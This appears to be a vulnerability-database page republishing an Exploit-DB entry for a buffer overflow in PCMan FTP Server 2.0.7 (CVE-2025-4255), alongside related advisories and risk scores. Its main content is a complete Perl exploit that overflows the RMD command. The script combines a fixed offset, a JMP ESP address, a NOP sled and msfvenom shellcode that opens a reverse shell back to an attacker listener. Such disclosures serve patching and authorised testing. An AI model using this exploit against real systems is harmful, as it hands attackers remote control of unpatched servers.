PCMan FTP Server 2.0.7 - Buffer Overflow

🗓️ 15 Jun 2025 00:00:00Reported by Fernando MengaliType

exploitdb🔗 www.exploit-db.com👁 346 Views

PCMan FTP Server 2.0.7 vulnerable to buffer overflow, CVE-2025-4255, exploit details included.

Reporter	Title	Published	Views	Family All 13
BDU FSTEC	The vulnerability of the PCMan FTP Server relates to the occurrence of operations beyond the buffer boundaries in memory. This allows attackers to compromise the confidentiality, integrity, and accessibility of the protected information.	6 May 202500:00	–	bdu_fstec
Circl	CVE-2025-4255	4 May 202519:35	–	circl
CNNVD	PCMan FTP Server 安全漏洞	5 May 202500:00	–	cnnvd
CNVD	PCMan FTP Server RMD Command Handler Buffer Overflow Vulnerability	14 May 202500:00	–	cnvd
CVE	CVE-2025-4255	5 May 202500:00	–	cve
Cvelist	CVE-2025-4255 PCMan FTP Server RMD Command buffer overflow	5 May 202500:00	–	cvelist
EUVD	EUVD-2025-13341	3 Oct 202520:07	–	euvd
NVD	CVE-2025-4255	5 May 202500:15	–	nvd
OSV	CVE-2025-4255	5 May 202500:15	–	osv
Packet Storm	📄 PCMan FTP Server 2.0.7 Buffer Overflow	17 Jun 202500:00	–	packetstorm

# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255

# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)

my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
"\x17";


# Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)

my $sock = IO::Socket::INET->new(
    PeerAddr => "192.168.176.131",
    PeerPort => "21",
    Proto    => 'tcp',
) or die "Cannot connect to 192.168.176.131:21: $!\n";

my $offset = "A"x2007;
my $eip = "\xd9\x2f\xe3\x74";
my $nops = "\x90"x20;
my $payload = $offset . $eip . $nops . $buf;
my $r = <$sock>;
print $sock "USER anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "PASS anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "RMD $payload\r\n";
$r = <$sock>;
print $r;
sleep(1);
close($sock);

15 Jun 2025 00:00Current

7High risk

Vulners AI Score7

CVSS 3.17.3 - 9.8

CVSS 46.9

CVSS 27.5

CVSS 37.3

EPSS0.01885

SSVC